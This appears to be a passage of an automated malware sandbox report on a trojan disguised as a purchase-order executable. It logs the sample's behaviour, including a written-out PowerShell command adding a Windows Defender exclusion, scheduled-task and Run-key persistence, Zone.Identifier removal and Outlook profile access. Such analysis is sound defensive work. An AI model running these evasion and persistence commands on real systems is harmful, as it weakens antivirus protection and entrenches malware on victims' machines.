                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000009.00000000.279735908.00000000007B8000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSZArrayEnumera.exe6 vs Purchase order 450080088 proj. Allt Charnan.exe
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000009.00000002.510429258.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameOaCZByYRZIaXaKflASJVDoK.exe4 vs Purchase order 450080088 proj. Allt Charnan.exe
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, 00000009.00000002.512965723.0000000000B58000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Purchase order 450080088 proj. Allt Charnan.exe
                    Source: Purchase order 450080088 proj. Allt Charnan.exeBinary or memory string: OriginalFilenameSZArrayEnumera.exe6 vs Purchase order 450080088 proj. Allt Charnan.exe
                    Source: Purchase order 450080088 proj. Allt Charnan.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: NpPgfycY.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: jVULYR.exe.9.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: Purchase order 450080088 proj. Allt Charnan.exeVirustotal: Detection: 37%
                    Source: Purchase order 450080088 proj. Allt Charnan.exeReversingLabs: Detection: 61%
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeFile read: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeJump to behavior
                    Source: Purchase order 450080088 proj. Allt Charnan.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: unknownProcess created: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe "C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe"
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NpPgfycY.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NpPgfycY" /XML "C:\Users\user\AppData\Local\Temp\tmp86F3.tmp
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess created: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess created: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe "C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe"
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NpPgfycY" /XML "C:\Users\user\AppData\Local\Temp\tmpFBF4.tmp
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe "C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess created: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NpPgfycY" /XML "C:\Users\user\AppData\Local\Temp\tmp2B32.tmp
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess created: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NpPgfycY.exe
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NpPgfycY" /XML "C:\Users\user\AppData\Local\Temp\tmp86F3.tmp
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess created: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess created: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exe
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NpPgfycY" /XML "C:\Users\user\AppData\Local\Temp\tmpFBF4.tmp
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess created: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NpPgfycY" /XML "C:\Users\user\AppData\Local\Temp\tmp2B32.tmp
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeProcess created: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeFile created: C:\Users\user\AppData\Roaming\NpPgfycY.exeJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeFile created: C:\Users\user\AppData\Local\Temp\tmp86F3.tmpJump to behavior
                    Source: classification engineClassification label: mal100.troj.adwa.spyw.evad.winEXE@23/16@12/3
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6956:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7064:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1260:120:WilError_01
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7132:120:WilError_01
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, Ej/rT.csCryptographic APIs: 'CreateDecryptor'
                    Source: Purchase order 450080088 proj. Allt Charnan.exe, Ej/rT.csCryptographic APIs: 'CreateDecryptor'
                    Source: NpPgfycY.exe.0.dr, Ej/rT.csCryptographic APIs: 'CreateDecryptor'
                    Source: NpPgfycY.exe.0.dr, Ej/rT.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.b30000.0.unpack, Ej/rT.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.b30000.0.unpack, Ej/rT.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.0.Purchase order 450080088 proj. Allt Charnan.exe.b30000.0.unpack, Ej/rT.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.0.Purchase order 450080088 proj. Allt Charnan.exe.b30000.0.unpack, Ej/rT.csCryptographic APIs: 'CreateDecryptor'
                    Source: 8.0.Purchase order 450080088 proj. Allt Charnan.exe.2d0000.2.unpack, Ej/rT.csCryptographic APIs: 'CreateDecryptor'
                    Source: 8.0.Purchase order 450080088 proj. Allt Charnan.exe.2d0000.2.unpack, Ej/rT.csCryptographic APIs: 'CreateDecryptor'
                    Source: 8.0.Purchase order 450080088 proj. Allt Charnan.exe.2d0000.1.unpack, Ej/rT.csCryptographic APIs: 'CreateDecryptor'
                    Source: 8.0.Purchase order 450080088 proj. Allt Charnan.exe.2d0000.1.unpack, Ej/rT.csCryptographic APIs: 'CreateDecryptor'
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: Purchase order 450080088 proj. Allt Charnan.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: Purchase order 450080088 proj. Allt Charnan.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Source: Purchase order 450080088 proj. Allt Charnan.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: SZArrayEnumera.pdb source: jVULYR.exe, jVULYR.exe, 00000019.00000000.348771513.00000000009B2000.00000002.00000001.01000000.00000009.sdmp, jVULYR.exe, 0000001D.00000000.371444039.0000000000822000.00000002.00000001.01000000.00000009.sdmp, Purchase order 450080088 proj. Allt Charnan.exe, jVULYR.exe.9.dr, NpPgfycY.exe.0.dr

                    Data Obfuscation

                    barindex
                    .NET source code contains method to dynamically call methods (often used by packers)
                    Source: NpPgfycY.exe.0.dr, Ej/rT.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                    Source: 0.2.Purchase order 450080088 proj. Allt Charnan.exe.b30000.0.unpack, Ej/rT.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                    Source: 8.0.Purchase order 450080088 proj. Allt Charnan.exe.2d0000.2.unpack, Ej/rT.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                    Source: 8.0.Purchase order 450080088 proj. Allt Charnan.exe.2d0000.1.unpack, Ej/rT.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                    Source: 8.0.Purchase order 450080088 proj. Allt Charnan.exe.2d0000.3.unpack, Ej/rT.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                    Source: 8.0.Purchase order 450080088 proj. Allt Charnan.exe.2d0000.0.unpack, Ej/rT.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                    Source: 8.2.Purchase order 450080088 proj. Allt Charnan.exe.2d0000.0.unpack, Ej/rT.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                    Source: jVULYR.exe.9.dr, Ej/rT.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 0_2_02D48DEE pushad ; retf
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 0_2_02D490DC pushad ; retf
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 0_2_07AA65E5 push edi; retf
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 0_2_07AA4AD5 push edx; iretd
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 9_2_00FC2F10 push ss; retf
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 9_2_064B9A25 push ss; retf
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 9_2_064B072C push 0000001Ah; retf
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 9_2_064B3330 push es; iretd
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 9_2_064B3330 push es; iretd
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 9_2_064B2C74 push 0000001Ah; retf
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 9_2_064BDCE5 push 0000001Ah; retf
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 9_2_064B18F6 push es; ret
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 9_2_064B18AA push es; ret
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 9_2_064B18BD push es; ret
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 9_2_064B2177 push edi; retn 0000h
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 9_2_064B1909 push es; ret
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 9_2_064B41D9 push es; iretd
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 9_2_064B41D1 push es; iretd
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeCode function: 9_2_064B15F7 push 0000001Ah; retf
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 20_2_01278DEE pushad ; retf
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 20_2_012790DC pushad ; retf
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 20_2_05183F76 push edi; iretd
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 20_2_08CD348D push edx; iretd
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 23_2_011AA64B pushad ; retf
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 23_2_011A8DEE pushad ; retf
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 23_2_011A90DC pushad ; retf
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 23_2_011A981A pushfd ; iretd
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 23_2_08D5348D push edx; iretd
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 25_2_05799990 push 0000001Ah; retf
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 25_2_0579985B push 0000001Ah; retf
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeCode function: 25_2_06344B0B push ss; retf
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.75961172037
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.75961172037
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.75961172037
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeFile created: \purchase order 450080088 proj. allt charnan.exe
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeFile created: \purchase order 450080088 proj. allt charnan.exe
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeFile created: \purchase order 450080088 proj. allt charnan.exe
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeFile created: \purchase order 450080088 proj. allt charnan.exe
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeFile created: \purchase order 450080088 proj. allt charnan.exe
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeFile created: \purchase order 450080088 proj. allt charnan.exe
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeFile created: \purchase order 450080088 proj. allt charnan.exe
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeFile created: \purchase order 450080088 proj. allt charnan.exe
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeFile created: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeFile created: C:\Users\user\AppData\Roaming\NpPgfycY.exeJump to dropped file

                    Boot Survival

                    barindex
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NpPgfycY" /XML "C:\Users\user\AppData\Local\Temp\tmp86F3.tmp
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run jVULYRJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run jVULYRJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Hides that the sample has been downloaded from the Internet (zone.identifier)
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeFile opened: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exe:Zone.Identifier read attributes | delete
                    Source: C:\Users\user\AppData\Roaming\jVULYR\jVULYR.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
